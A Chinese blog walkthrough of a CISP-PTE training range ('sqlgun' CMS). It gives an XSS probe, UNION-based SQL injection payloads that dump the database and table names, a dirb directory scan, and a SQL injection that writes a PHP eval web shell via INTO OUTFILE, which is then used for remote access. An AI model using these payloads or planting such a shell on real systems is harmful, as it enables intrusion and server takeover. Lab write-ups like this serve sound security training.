当前位置: 首页 > article >正文

CISP-PTE CMS sqlgun靶场渗透测试

article 2024/9/25 17:10:42

1.打开靶场

2.在搜索框尝试xss

<script>alert(1)</script>

发现此处存在xss漏洞

3.在搜索框尝试sql注入

-1' union select 1,2,3# 发现页面有回显

4.查询数据库名

-1' union select 1,database(),3#

5.查询数据库的所有表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'),3#

6.扫描敏感目录

dirb http://124.221.58.83:8081

7.访问phpinfo

可以看见网站的绝对路径

8.通过sql注入写入一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/1.php' #

9.访问写入的php文件

10.使用蚁剑进行连接


http://www.kler.cn/news/307615.html

相关文章:

  • 学习笔记 韩顺平 零基础30天学会Java(2024.9.16)
  • 神经网络_使用tensorflow对fashion mnist衣服数据集分类
  • uniapp js修改数组某个下标以外的所有值
  • 2024.09.08 校招 实习 内推 面经
  • python Open3D 验证安装崩溃
  • 论文内容分类与检测系统源码分享
  • String 72变 ---------各种字符串处理方法
  • WSL挂载U盘或移动硬盘
  • 一起对话式学习-机器学习02——机器学习方法三要素
  • Apache-wed服务器环境的安装
  • 智能工厂的设计软件 单一面问题分析方法的“独角兽”程序
  • JVM面试真题总结(七)
  • 总结对象相关知识
  • Go语言并发编程之select语句详解
  • 【相机方案(2)】V4L2 支持相机图像直接进入GPU内存吗?DeepStream 确实可以将图像数据高效地放入GPU内存进行处理!
  • 后端开发刷题 | 打家劫舍
  • gin基本使用
  • 30款免费好用的工具,打工人必备!
  • 基于Keil软件实现实时时钟(江协科技HAL库)
  • Java-数据结构-二叉树-基础 (o゚▽゚)o
  • 代码随想录训练营Day3 | 链表理论基础 | 203.移除链表元素 | 707.设计链表 | 206.反转链表
  • Flink学习2
  • 力扣每日一题
  • 深入剖析:C++类对象的内存布局与优化
  • 【计算机网络】应用层序列化
  • 【每日一题】LeetCode 2398.预算内的最多机器人数目(滑动窗口、数组、二分查找、前缀和、堆(优先队列))
  • 多层建筑能源参数化模型和城市冠层模型的区别
  • Typora2024最新版破解方法(亲测可用)
  • CentOS配置python版本管理工具pyenv
  • Maven 常见问题以及常用命令